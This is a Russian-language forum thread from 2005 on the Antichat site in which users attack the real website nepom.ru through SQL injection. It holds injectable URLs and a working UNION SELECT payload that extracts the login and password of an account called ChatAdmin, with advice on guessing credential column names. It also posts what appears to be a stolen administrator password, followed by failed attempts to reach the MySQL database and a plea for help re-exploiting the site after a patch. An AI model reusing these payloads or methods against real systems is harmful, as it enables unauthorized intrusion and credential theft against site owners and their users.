ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Sql иньекция в nepom.ru (https://forum.antichat.xyz/showthread.php?t=9840)

Thief 06.10.2005 11:05

http://nepom.ru/interest/?raz=1%27
http://nepom.ru/users/?login=%27
Не выходит выполнить запрос. Что-то быстро они багу та увидали надеюсь всё мирно будет

virgoz 06.10.2005 12:22

Продолжение следует :)
http://nepom.ru/story/text.php?id=-1'+UNION+SELECT+1,2,3,login,passwd,6,7,8,9,10,11 FROM+users+where+login='ChatAdmin'/*

Thief 07.10.2005 07:38

virgoz -- благодарю только вот у меня вопрос как ты догадался что там есть login,passwd ............ Крутая иньекция получилась:)

virgoz 07.10.2005 14:28

login, passwd, uname, username, user, pass, password, pas - самые распостраненные имена для столбцов c паролями и логинами.

Thief 10.10.2005 13:18

Вот на досуге полазал нашол следующее
Administrator
ytnvtyz
Вообщем не без вашей помощи удалось добыть далее захожу и нахожу бд my sql... Вот только почемута не получается войти пароль может иной или доступ только по IP можете взглянуть может у вас чтонибуть выйдет........

Deniska 10.10.2005 14:44

Та же беда
Не пускает.

Thief 11.10.2005 07:15

Ну жаль скорее всего идёт проверка по Ip потому и не пускает мне в принципе прав админа хватает...

Thief 06.11.2005 11:09

Здраствуйте снова был такой ресурс nepom.ru потом временно его не стало но сейчас он появился снова но пропатчиный но со старой дыркой http://nepom.ru/interest/?raz='
Иньекцию не получается сделать никак, нет таких мозгов как virgoz[B] Помогите...

Deem3n® 07.11.2005 16:22

http://nepom.ru/interest/?raz='
Запрос SELECT `id` FROM `int` WHERE `raz`=''' не выполнен

выбор идет только по одному INTEGER полю


Время: 12:39